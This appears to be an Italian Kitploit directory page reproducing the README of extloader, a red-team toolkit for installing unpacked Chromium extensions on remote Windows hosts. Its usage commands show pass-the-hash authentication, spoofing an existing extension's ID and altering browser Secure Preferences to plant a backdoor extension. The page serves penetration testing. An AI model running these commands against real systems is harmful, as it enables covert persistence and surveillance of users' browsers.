Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
extloader — Un toolkit per l'exploitation delle estensioni Chromium | Kitploit
Strumenti/GitHubGitHub/synacktiv/extloader
Meccanismi di PersistenzaExploitSfruttamento di Applicazioni WebRaccolta InformazioniPost-ExploitPenetration TestingRed Teaming
GitHubsynacktiv/extloader

extloader

Un toolkit per l'exploitation delle estensioni Chromium

Vedi Repository
262711 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

extLoader

Un piccolo toolkit per gestire e distribuire estensioni Chromium non impacchettate.

Scopri di più nel seguente post del blog: https://www.synacktiv.com/en/publications/the-phantom-extension-backdooring-chrome-through-uncharted-pathways

Installazione

Installazione diretta (pipx)

root@kitploit:~
pipx install .
extloader --help

Usa pipx per un'installazione isolata che richiede Python 3.10+.

Configurazione di sviluppo (uv)

root@kitploit:~
uv venv
source .venv/bin/activate
uv pip install -e .

Opzioni di autenticazione

  • Password: -p/--password
Scarica lo strumento
  • Hash: -H/--hash (formato LM:NT o solo NT)
  • Dominio: -d/--domain (predefinito: WORKGROUP)
  • Parametri comuni

    • -t, --target: IP/hostname del target
    • -u, --username: Nome utente
    • -i, --index: Indice utente dal comando check
    • --debug: Abilita log di debug

    Utilizzo

    Ecco un esempio passo passo di distribuzione di un'estensione:

    1. Per prima cosa, controlla i target disponibili:
    root@kitploit:~
    # This will list available users and browsers
    extloader check -t 192.168.1.100 -u admin -H aad3b435b51404eeaad3b435b51404ee:ntlm_hash -d corp.local
    
    ┏━━━━━━━━┳━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
    ┃ Index  ┃ Browser         ┃ User (SID)                                                   ┃
    ┡━━━━━━━━╇━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
    │   1    │ Chrome          │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
    │   2    │ Microsoft Edge  │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
    └────────┴─────────────────┴──────────────────────────────────────────────────────────────┘
    

    Quando esegui l'exploit su una macchina diversa, esegui sempre prima il comando check per aggiornare il contesto (available_targets.json).

    1. Prepara il manifest (firma o contraffa un ID):
    root@kitploit:~
    # Create a deterministic crx_id by adding a key to the manifest.json
    extloader sign --extension ./my-extension
    

    Per falsificare un ID di estensione esistente, salta il comando precedente e imposta la chiave key del manifest sulla chiave pubblica base64 dell'estensione che stai imitando. Riutilizzare quella chiave mantiene invariato l'ID CRX.

    1. Distribuisci l'estensione:
    root@kitploit:~
    # Deploy to user index 1 (Chrome of john.doe)
    extloader exploit -t 192.168.1.100 -u admin -H ntlm_hash -i 1 --extension ./my-extension
    

    4.(Alternativa) Crea un pacchetto per la distribuzione manuale:

    root@kitploit:~
    # Bundle the signed extension with the captured Preferences file
    extloader package --prefs-file "Preferences" --extension-dir ./my-extension --target-dir "C:\\Users\\Public"
    
    # This creates a ZIP containing:
    # - Signed extension files
    # - Updated preferences files
    # - Deployment instructions
    

    --prefs-file si aspetta le preferenze del profilo del browser di cui hai eseguito il backup (Chrome/Edge le salvano come Secure Preferences, gli altri browser Chromium usano Preferences). Il loader le copia, le modifica e include sia la versione modificata sia quella originale nel pacchetto.

    root@kitploit:~
    ├── extension/
    │   └── chrome-mv3/
    ├── preferences/
    │   ├── brave/
    │   ├── chrome/
    │   ├── chromium/
        [...]
    └── info.json
    
    1. Ripristina le preferenze originali se necessario:
    root@kitploit:~
    # Restore original preferences for user index 1 (need check command to get the correct context)
    extloader restore -t 192.168.1.100 -u admin -H ntlm_hash -i 1 -f ./backup_preferences
    

    TODO

    • Supporto Kerberos
    • Modulo nxc
    • Adattare il flusso di lavoro package per Linux
    • Adattare il flusso di lavoro package per macOS